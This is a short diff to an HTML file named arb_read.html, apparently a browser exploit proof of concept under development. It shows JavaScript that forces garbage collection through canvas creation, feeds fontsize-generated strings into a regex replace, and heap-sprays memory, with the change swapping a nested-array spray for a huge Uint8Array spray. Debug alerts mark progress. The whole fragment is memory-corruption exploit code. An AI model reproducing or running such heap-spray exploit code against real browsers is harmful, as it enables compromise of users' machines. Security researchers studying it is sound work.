--- a/arb_read.html
+++ b/arb_read.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start with spray1");
+alert("start with uint8");
 function gc() {
     try {
         var c = document.createElement("canvas");
@@ -43,15 +43,9 @@ arr[i] = c.fontsize(1);
 }
 var s1 = c.fontsize(1) ;
 x.replace(/\d/g, s1);
-var spray=new Array(0x2000);
-for(var i=0;i<spray.length;i++){
- spray[i]=new Array(0x1000); 
-    for(var j=0;j<spray[i].length;j++){
-     spray[i][j]=0xAAAA;   
-    }
-}
-alert("ok");
 
+alert("ok");
+var spray=new Uint8Array(0x10000000);
 var a=0;
 var b="";
 while(1){
